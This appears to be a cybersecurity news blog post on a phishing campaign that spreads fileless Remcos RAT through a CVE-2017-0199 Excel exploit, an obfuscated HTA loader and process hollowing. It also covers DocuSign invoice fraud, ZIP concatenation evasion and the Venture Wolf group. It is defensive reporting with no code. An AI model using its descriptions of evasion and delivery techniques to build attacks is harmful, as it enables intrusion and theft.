Cyber Blog

Cybersecurity experts have uncovered a phishing campaign distributing a new fileless version of the commercial malware Remcos RAT.

Remcos RAT, which is commonly marketed for remote computer management, “offers buyers a range of advanced features for controlling targeted computers,” explained Fortinet FortiGuard Labs researcher Xiaopeng Zhang in an analysis last week. However, cybercriminals have exploited Remcos to steal sensitive information and gain unauthorized control over victims’ systems.

The attack begins with a phishing email disguised as a purchase order, prompting recipients to open a malicious Microsoft Excel attachment. This Excel file exploits a known remote code execution vulnerability in Microsoft Office (CVE-2017-0199, CVSS score: 7.8) to download and execute an HTML Application (HTA) file (“cookienetbookinetcahce.hta”) from a remote server (“192.3.220[.]22”).

The HTA file is heavily obfuscated, using layers of JavaScript, Visual Basic Script, and PowerShell code to evade detection. Its primary function is to download and run an executable file from the same server, which subsequently launches an obfuscated PowerShell program. The malicious code uses anti-analysis and anti-debugging tactics to further evade detection before ultimately loading Remcos RAT through a process called “process hollowing,” embedding it directly into system memory without leaving a physical file on the disk.

Remcos RAT enables attackers to harvest data and execute commands on the infected system, including collecting system details, managing files, manipulating system services, editing the Windows Registry, capturing clipboard data, altering desktop settings, enabling cameras and microphones, downloading additional payloads, recording the screen, and even disabling keyboard or mouse input.

The disclosure comes as Wallarm reports that attackers are also misusing DocuSign APIs to send convincing fake invoices, tricking users into approving fraudulent payments. By leveraging legitimate DocuSign accounts and templates, the attackers mimic well-known brands like Norton Antivirus, making it harder for users and security tools to identify these as phishing attempts. Once users e-sign these documents, attackers can request payment outside DocuSign or send the signed documents directly to a finance team for payment processing.

Another phishing tactic observed recently involves a method called ZIP file concatenation, which combines multiple ZIP files into one to bypass security tools. This technique exploits variations in how programs like 7-Zip, WinRAR, and Windows File Explorer handle ZIP files, making it easy for attackers to conceal malicious content in seemingly harmless files.

Finally, a hacker group known as Venture Wolf has been linked to phishing attacks targeting sectors in Russia, including manufacturing, IT, construction, and telecommunications. The group uses MetaStealer, a variant of the RedLine Stealer malware, to gather sensitive data and infiltrate networks in these industries.